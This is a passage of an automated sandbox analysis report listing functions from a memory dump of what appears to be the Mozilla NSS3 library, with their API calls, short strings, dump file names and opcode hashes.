PK11_IsLoggedIn.NSS3(?,?,?,6C692E62,?,?,?,?,?,?,?,00000000,?,?,?,6C664F1C), ref: 6C678EC3
TlsGetValue.KERNEL32(?,?,?,6C692E62,?,?,?,?,?,?,?,00000000,?,?,?,6C664F1C), ref: 6C678EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C692E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C678EF1
PR_Unlock.NSS3 ref: 6C678F20

Strings

b.il, xrefs: 6C678E96, 6C678F25

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.il
API String ID: 1978757487-1921218275
Opcode ID: e83cc7f2db6ea076c212bdfd937235ba5b15d3f2ae2ea9bdf130985810c419da
Instruction ID: d589748912b51aad0dc5bac8657d9d82ec45b37514a343fa6f63ff163eb44522
Opcode Fuzzy Hash: e83cc7f2db6ea076c212bdfd937235ba5b15d3f2ae2ea9bdf130985810c419da
Instruction Fuzzy Hash: 43219C70908705AFC700AF29D184599BBF0FF49368F01496EEC98ABB50D734E854CBEA

Function 6C6A8970 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,6C6561C4,?,6C655639,00000000), ref: 6C6A8991
TlsGetValue.KERNEL32(?,?,?,?,?,6C655639,00000000), ref: 6C6A89AD
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C655639,00000000), ref: 6C6A89C6
PR_WaitCondVar.NSS3 ref: 6C6A89F7
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C655639,00000000), ref: 6C6A8A0C

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

Strings

9Vel, xrefs: 6C6A8986

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID: 9Vel
API String ID: 2759447159-2564327588
Opcode ID: ae70a4275f9813437abae35a1f188417875dbcf94b2a85eb775273613b9c9b43
Instruction ID: 7e7e865436fc929d207a9654a4e52105fd6c9a5b42e8fa3942168069beb134ea
Opcode Fuzzy Hash: ae70a4275f9813437abae35a1f188417875dbcf94b2a85eb775273613b9c9b43
Instruction Fuzzy Hash: 0F21A1B0904745DFCB00AFBCC4846A9BBF4FF0A348F114666DC9897611E730D896CB9A

Function 6C762C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C762CA0
PR_ExitMonitor.NSS3 ref: 6C762CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C762CD1
strdup.MOZGLUE(?), ref: 6C762CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C762D27

Strings

Loaded library %s (static lib), xrefs: 6C762D22

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 32b5959640ecfa131aad2b8bff234dbda60cb95fa719d632edbc88c649cf4e43
Instruction ID: cdf06b865eb46c87cc1f52af93245874f40d05e4d73b23d7269d894145112d2a
Opcode Fuzzy Hash: 32b5959640ecfa131aad2b8bff234dbda60cb95fa719d632edbc88c649cf4e43
Instruction Fuzzy Hash: 4F1104B17012059FEB008F16D949E6677B5AB4634EF14813DDC09C7F41EB31D808CBA5

Function 6C6568E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C6568FB
EnterCriticalSection.KERNEL32 ref: 6C656913
PORT_FreeArena_Util.NSS3 ref: 6C65693E
PR_Unlock.NSS3 ref: 6C656946
DeleteCriticalSection.KERNEL32 ref: 6C656951
free.MOZGLUE ref: 6C65695D
PR_Unlock.NSS3 ref: 6C656968

Part of subcall function 6C6FDD70: TlsGetValue.KERNEL32 ref: 6C6FDD8C
Part of subcall function 6C6FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6FDDB4

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
String ID:
API String ID: 1628394932-0
Opcode ID: 709ce9a1cf7bdca4a11bd0bc705e9719606e679a0368b8e6048d8a2abc26bb29
Instruction ID: 1186f061dae9d1c324227222675b1924f0412b4567465bfcd6ff4b6a8cb239f0
Opcode Fuzzy Hash: 709ce9a1cf7bdca4a11bd0bc705e9719606e679a0368b8e6048d8a2abc26bb29
Instruction Fuzzy Hash: F91149B16047069FDB00AFB8D48856EBBF4BF46349F114568D898DB701EB31E498CB96

Function 6C6B0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6587ED,00000800,6C64EF74,00000000), ref: 6C6B1000
PR_NewLock.NSS3(?,00000800,6C64EF74,00000000), ref: 6C6B1016

Part of subcall function 6C7198D0: calloc.MOZGLUE(00000001,00000084,6C640936,00000001,?,6C64102C), ref: 6C7198E5

PL_InitArenaPool.NSS3(00000000,security,6C6587ED,00000008,?,00000800,6C64EF74,00000000), ref: 6C6B102B
TlsGetValue.KERNEL32(00000000,?,?,6C6587ED,00000800,6C64EF74,00000000), ref: 6C6B1044
free.MOZGLUE(00000000,?,00000800,6C64EF74,00000000), ref: 6C6B1064

Strings

security, xrefs: 6C6B1025

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: bd90b978edea6d3122b3eb98b98188e14774337e2ae5317340e5e2e77fbbdb66
Instruction ID: 8c93f49064b597ba2401bade9a46978980df02935f628d62746fdb0b1c880ab2
Opcode Fuzzy Hash: bd90b978edea6d3122b3eb98b98188e14774337e2ae5317340e5e2e77fbbdb66
Instruction Fuzzy Hash: B2010831640250B7E7202F6DAC05B963678BF17789F014135E908A6A51EF71C165DBDA

Function 6C6F49C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000678,?,?,6C6E5F34,00000A20), ref: 6C6F49EC

Part of subcall function 6C6AFAB0: free.MOZGLUE(?,-00000001,?,?,6C64F673,00000000,00000000), ref: 6C6AFAC7

SECITEM_ZfreeItem_Util.NSS3(?,00000000,6C6E5F34,00000A20,?,?,?,?,?,?,?,?,?,6C6EAAD4), ref: 6C6F49F9
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,6C6E5F34,00000A20,?,?,?,?,?,?,?,?,?,6C6EAAD4), ref: 6C6F4A06
free.MOZGLUE(?,?,?,?,?,6C6E5F34,00000A20), ref: 6C6F4A16
free.MOZGLUE(?,?,?,?,?,6C6E5F34,00000A20), ref: 6C6F4A1C

Strings

4_nl , xrefs: 6C6F49C6, 6C6F4A21

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Item_UtilZfreefree
String ID: 4_nl
API String ID: 2193358613-2064630730
Opcode ID: e024a7eed4bf2129fbf482b23046e35aa3b6bf9d426d3cd52faf0511cf5464c7
Instruction ID: c3a2f06a32a4ecbcfddedaff507528a8dbbbae799d629f3c99d7bbaaa3316d84
Opcode Fuzzy Hash: e024a7eed4bf2129fbf482b23046e35aa3b6bf9d426d3cd52faf0511cf5464c7
Instruction Fuzzy Hash: C3015E76A001049FCB00CF69DCC4C967BBCEF8A24970484A5E909CB706E731ED05CBA6

Function 6C76CBE0 Relevance: 10.5, APIs: 7, Instructions: 46COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000010), ref: 6C76CBEA
PR_NewLock.NSS3 ref: 6C76CBF9

Part of subcall function 6C7198D0: calloc.MOZGLUE(00000001,00000084,6C640936,00000001,?,6C64102C), ref: 6C7198E5

PR_NewCondVar.NSS3(00000000), ref: 6C76CC05

Part of subcall function 6C63BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C6421BC), ref: 6C63BB8C

free.MOZGLUE(00000000), ref: 6C76CC1C
DeleteCriticalSection.KERNEL32(-0000001C), ref: 6C76CC34
free.MOZGLUE(00000000), ref: 6C76CC41
free.MOZGLUE(00000000), ref: 6C76CC47

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: callocfree$CondCriticalDeleteLockSection
String ID:
API String ID: 687540378-0
Opcode ID: 39ca8d61c33c099631fb107f9fc8f060096c24c62dc01fedf2bd4d7124e4b93d
Instruction ID: caf59f1f7c25f9c967ee2814dcbaa56b46de3ca71ca03d959afd50a0b83d7b8c
Opcode Fuzzy Hash: 39ca8d61c33c099631fb107f9fc8f060096c24c62dc01fedf2bd4d7124e4b93d
Instruction Fuzzy Hash: BBF0A4717012116BEB007ABAAD49AAF3698AF467AFF040434ED49C3F01EA16D41587A6

Function 6C76C9B0 Relevance: 10.5, APIs: 7, Instructions: 45COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00000000,6C6E1AB6,00000000,?,?,6C6E07B9,?), ref: 6C76C9C6
free.MOZGLUE(?,?,6C6E07B9,?), ref: 6C76C9D3
DeleteCriticalSection.KERNEL32(00000000,00000001), ref: 6C76C9E5
free.MOZGLUE(?), ref: 6C76C9EC
DeleteCriticalSection.KERNEL32(00000080), ref: 6C76C9F8
free.MOZGLUE(?), ref: 6C76C9FF
free.MOZGLUE(00000000), ref: 6C76CA0B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: e242632e3b0eec2aa67fa17dadc07a5f76134ecb0e7fbb58d945e4f215dc1ea2
Instruction ID: c6a2889d07b0d2e5b77a4fcf41939f49f35acae7525304181689a3e8c7cbae8c
Opcode Fuzzy Hash: e242632e3b0eec2aa67fa17dadc07a5f76134ecb0e7fbb58d945e4f215dc1ea2
Instruction Fuzzy Hash: 3F012CB2600605ABDB00EFE4DC4896BB7F8FA492627040539E906C3A00D736F455CBA1

Function 6C6F2E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6F3046

Part of subcall function 6C6DEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6DEE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C6C7FFB), ref: 6C6F312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6F3154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6F2E8B

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

Part of subcall function 6C6DF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C6C9BFF,?,00000000,00000000), ref: 6C6DF134

memcpy.VCRUNTIME140(8B3C75C0,?,6C6C7FFA), ref: 6C6F2EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6F317B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: b648f4de03007986c9460b15d980632054d35ac317c6359216f981ff72c97117
Instruction ID: f8f5d4d53ba9776809a09e652965c1dd041f9ba1af1efbf5b2ef7fc5339d2de9
Opcode Fuzzy Hash: b648f4de03007986c9460b15d980632054d35ac317c6359216f981ff72c97117
Instruction Fuzzy Hash: 9AA1D071A002189FDB24CF54CC84BEAB7B6EF45308F148099ED596B741E731AD46CFA6

Function 6C6AA970 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4004918fb33705ea85bd4b5f53255277b755f223fde456a222c14471b181d2b7
Instruction ID: 0994f179d7f9a87a74c1373665cacc2cf0411ff6212a7dcf4d42ad0aa1e9f106
Opcode Fuzzy Hash: 4004918fb33705ea85bd4b5f53255277b755f223fde456a222c14471b181d2b7
Instruction Fuzzy Hash: FC910D30D041684FCB258E9988913DEB7F6AF4A31CF1581EBC5999BA03D6314E87CF99

Function 6C6BED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C6BED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C6BEDCE

Part of subcall function 6C6B0BE0: malloc.MOZGLUE(6C6A8D2D,?,00000000,?), ref: 6C6B0BF8
Part of subcall function 6C6B0BE0: TlsGetValue.KERNEL32(6C6A8D2D,?,00000000,?), ref: 6C6B0C15

free.MOZGLUE(00000000,?,?,?,?,6C6BB04F), ref: 6C6BEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C6BEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C6BEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C6BEEFB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 950ad24414c2f0046eb32e9d18ee5f86b0c7ed8648fce2f79d91fbbd838a1617
Instruction ID: ed0e2b82c5d8c0918f4eba002951f7eef7a561eb8374721b122411793bd032d3
Opcode Fuzzy Hash: 950ad24414c2f0046eb32e9d18ee5f86b0c7ed8648fce2f79d91fbbd838a1617
Instruction Fuzzy Hash: 6281ADB5A002059FEB10CF59DC84BAB77F5FF89308F144468E815AB751DB30E826CBA9

Function 6C6BCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6BC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C6BDAE2,?), ref: 6C6BC6C2

PR_Now.NSS3 ref: 6C6BCD35

Part of subcall function 6C719DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C760A27), ref: 6C719DC6
Part of subcall function 6C719DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C760A27), ref: 6C719DD1
Part of subcall function 6C719DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C719DED

Part of subcall function 6C6A6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C651C6F,00000000,00000004,?,?), ref: 6C6A6C3F

PR_GetCurrentThread.NSS3 ref: 6C6BCD54

Part of subcall function 6C719BF0: TlsGetValue.KERNEL32(?,?,?,6C760A75), ref: 6C719C07

Part of subcall function 6C6A7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C651CCC,00000000,00000000,?,?), ref: 6C6A729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6BCD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C6BCE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C6BCE2C

Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B10F3
Part of subcall function 6C6B10C0: EnterCriticalSection.KERNEL32(?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B110C
Part of subcall function 6C6B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1141
Part of subcall function 6C6B10C0: PR_Unlock.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1182
Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C6BCE40

Part of subcall function 6C6B14C0: TlsGetValue.KERNEL32 ref: 6C6B14E0
Part of subcall function 6C6B14C0: EnterCriticalSection.KERNEL32 ref: 6C6B14F5
Part of subcall function 6C6B14C0: PR_Unlock.NSS3 ref: 6C6B150D

Part of subcall function 6C6BCEE0: PORT_ArenaMark_Util.NSS3(?,6C6BCD93,?), ref: 6C6BCEEE
Part of subcall function 6C6BCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C6BCD93,?), ref: 6C6BCEFC
Part of subcall function 6C6BCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C6BCD93,?), ref: 6C6BCF0B
Part of subcall function 6C6BCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C6BCD93,?), ref: 6C6BCF1D

Part of subcall function 6C6BCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C6BCD93,?), ref: 6C6BCF47
Part of subcall function 6C6BCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C6BCD93,?), ref: 6C6BCF67
Part of subcall function 6C6BCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C6BCD93,?,?,?,?,?,?,?,?,?,?,?,6C6BCD93,?), ref: 6C6BCF78

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 77e3f55a0fa3dae1c62a8cb82c379bdcb217c792d9a5b2673b7e61187cc50e0c
Instruction ID: df4060638b9dfed6918a95f45276fd06404caec0ee5e3a7fd7dc208a94e18b80
Opcode Fuzzy Hash: 77e3f55a0fa3dae1c62a8cb82c379bdcb217c792d9a5b2673b7e61187cc50e0c
Instruction Fuzzy Hash: C451B3B6A00105ABE710DF69DC40B9A77E4EF48348F250524E946B7B40EB31EA26CB99

Function 6C6B8BA0 Relevance: 9.2, APIs: 6, Instructions: 150memorythreadCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3 ref: 6C6B8BCD

Part of subcall function 6C6B14C0: TlsGetValue.KERNEL32 ref: 6C6B14E0
Part of subcall function 6C6B14C0: EnterCriticalSection.KERNEL32 ref: 6C6B14F5
Part of subcall function 6C6B14C0: PR_Unlock.NSS3 ref: 6C6B150D

PORT_ArenaGrow_Util.NSS3(?,?,?), ref: 6C6B8BF9

Part of subcall function 6C6B1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C65895A,00000000,?,00000000,?,00000000,?,00000000,?,6C64F599,?,00000000), ref: 6C6B136A
